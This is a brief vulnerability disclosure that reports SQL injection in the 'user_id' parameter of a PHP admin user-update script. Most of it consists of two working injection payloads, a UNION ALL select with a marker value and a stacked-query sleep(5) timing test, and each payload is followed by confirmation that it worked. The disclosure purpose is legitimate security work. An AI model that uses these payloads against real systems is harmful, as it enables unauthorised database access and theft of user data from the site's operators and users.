BUG_Author:waibi8Bu
Vulnerability File: /reviewer/system/system/admins/manage/users/user-update.php
GET parameter 'user_id' exists SQL injection vulnerability
Payload1:user_id=2' union all select null,null,null,null,concat(0x353637,0x454647),null,null,null,null,null-- -
union query success
Payload2:user_id=2';select sleep(5)-- -
Stacked queries succeeded, server response time is 5 seconds

